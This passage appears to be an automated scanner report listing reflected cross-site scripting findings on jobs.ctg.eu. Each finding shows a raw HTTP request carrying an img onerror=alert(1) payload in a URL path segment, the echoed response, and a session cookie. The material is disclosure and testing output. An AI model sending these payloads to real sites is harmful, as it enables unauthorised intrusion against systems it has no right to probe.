Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:42:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-css-reset.cssd8cff"><img src=a onerror=alert(1)>6a1e3159388 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.117. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/structure.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 115eb"><img%20src%3da%20onerror%3dalert(1)>d9768e149d1 was submitted in the REST URL parameter 1. This input was echoed as 115eb"><img src=a onerror=alert(1)>d9768e149d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites115eb"><img%20src%3da%20onerror%3dalert(1)>d9768e149d1/all/themes/threesixty/css/structure.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites115eb"><img src=a onerror=alert(1)>d9768e149d1-all-themes-threesixty-css-structure.css not-front not-logged-in page-sites115ebimg-srca-onerroralert1d9768e149d1 no-sidebars">
...[SNIP]...

3.118. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/structure.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc85a"><img%20src%3da%20onerror%3dalert(1)>dc393d248fe was submitted in the REST URL parameter 2. This input was echoed as fc85a"><img src=a onerror=alert(1)>dc393d248fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/allfc85a"><img%20src%3da%20onerror%3dalert(1)>dc393d248fe/themes/threesixty/css/structure.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:35:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:35:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-allfc85a"><img src=a onerror=alert(1)>dc393d248fe-themes-threesixty-css-structure.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.119. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/structure.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68189"><img%20src%3da%20onerror%3dalert(1)>e75acd7573b was submitted in the REST URL parameter 3. This input was echoed as 68189"><img src=a onerror=alert(1)>e75acd7573b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes68189"><img%20src%3da%20onerror%3dalert(1)>e75acd7573b/threesixty/css/structure.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:37:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:37:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes68189"><img src=a onerror=alert(1)>e75acd7573b-threesixty-css-structure.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.120. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/structure.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f73e8"><img%20src%3da%20onerror%3dalert(1)>3a70b67ec54 was submitted in the REST URL parameter 4. This input was echoed as f73e8"><img src=a onerror=alert(1)>3a70b67ec54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixtyf73e8"><img%20src%3da%20onerror%3dalert(1)>3a70b67ec54/css/structure.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixtyf73e8"><img src=a onerror=alert(1)>3a70b67ec54-css-structure.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.121. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/structure.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89175"><img%20src%3da%20onerror%3dalert(1)>0ae966e8e0d was submitted in the REST URL parameter 5. This input was echoed as 89175"><img src=a onerror=alert(1)>0ae966e8e0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/css89175"><img%20src%3da%20onerror%3dalert(1)>0ae966e8e0d/structure.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-css89175"><img src=a onerror=alert(1)>0ae966e8e0d-structure.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.122. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/structure.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b2b6"><img%20src%3da%20onerror%3dalert(1)>3c9d629728 was submitted in the REST URL parameter 6. This input was echoed as 4b2b6"><img src=a onerror=alert(1)>3c9d629728 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/css/structure.css4b2b6"><img%20src%3da%20onerror%3dalert(1)>3c9d629728?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:42:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:42:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-css-structure.css4b2b6"><img src=a onerror=alert(1)>3c9d629728 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.123. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c822"><img%20src%3da%20onerror%3dalert(1)>883740fafdf was submitted in the REST URL parameter 1. This input was echoed as 1c822"><img src=a onerror=alert(1)>883740fafdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites1c822"><img%20src%3da%20onerror%3dalert(1)>883740fafdf/all/themes/threesixty/js/AC_RunActiveContent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites1c822"><img src=a onerror=alert(1)>883740fafdf-all-themes-threesixty-js-AC-RunActiveContent.js not-front not-logged-in page-sites1c822img-srca-onerroralert1883740fafdf no-sidebars">
...[SNIP]...

3.124. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2148"><img%20src%3da%20onerror%3dalert(1)>5cc8b9e6428 was submitted in the REST URL parameter 2. This input was echoed as f2148"><img src=a onerror=alert(1)>5cc8b9e6428 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/allf2148"><img%20src%3da%20onerror%3dalert(1)>5cc8b9e6428/themes/threesixty/js/AC_RunActiveContent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-allf2148"><img src=a onerror=alert(1)>5cc8b9e6428-themes-threesixty-js-AC-RunActiveContent.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.125. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 555a2"><img%20src%3da%20onerror%3dalert(1)>14329ddbf68 was submitted in the REST URL parameter 3. This input was echoed as 555a2"><img src=a onerror=alert(1)>14329ddbf68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes555a2"><img%20src%3da%20onerror%3dalert(1)>14329ddbf68/threesixty/js/AC_RunActiveContent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:42:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:42:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes555a2"><img src=a onerror=alert(1)>14329ddbf68-threesixty-js-AC-RunActiveContent.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.126. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d94b"><img%20src%3da%20onerror%3dalert(1)>d650ca39f03 was submitted in the REST URL parameter 4. This input was echoed as 7d94b"><img src=a onerror=alert(1)>d650ca39f03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty7d94b"><img%20src%3da%20onerror%3dalert(1)>d650ca39f03/js/AC_RunActiveContent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:44:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:44:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty7d94b"><img src=a onerror=alert(1)>d650ca39f03-js-AC-RunActiveContent.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.127. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 867ae"><img%20src%3da%20onerror%3dalert(1)>ab43a14ef03 was submitted in the REST URL parameter 5. This input was echoed as 867ae"><img src=a onerror=alert(1)>ab43a14ef03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/js867ae"><img%20src%3da%20onerror%3dalert(1)>ab43a14ef03/AC_RunActiveContent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:45:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:45:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-js867ae"><img src=a onerror=alert(1)>ab43a14ef03-AC-RunActiveContent.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.128. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf1a2"><img%20src%3da%20onerror%3dalert(1)>9e8f0dc5747 was submitted in the REST URL parameter 6. This input was echoed as bf1a2"><img src=a onerror=alert(1)>9e8f0dc5747 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/js/AC_RunActiveContent.jsbf1a2"><img%20src%3da%20onerror%3dalert(1)>9e8f0dc5747?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:46:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:46:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-js-AC-RunActiveContent.jsbf1a2"><img src=a onerror=alert(1)>9e8f0dc5747 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.129. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/easyTooltip.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9369b"><img%20src%3da%20onerror%3dalert(1)>60bd3b3e611 was submitted in the REST URL parameter 1. This input was echoed as 9369b"><img src=a onerror=alert(1)>60bd3b3e611 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites9369b"><img%20src%3da%20onerror%3dalert(1)>60bd3b3e611/all/themes/threesixty/js/easyTooltip.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
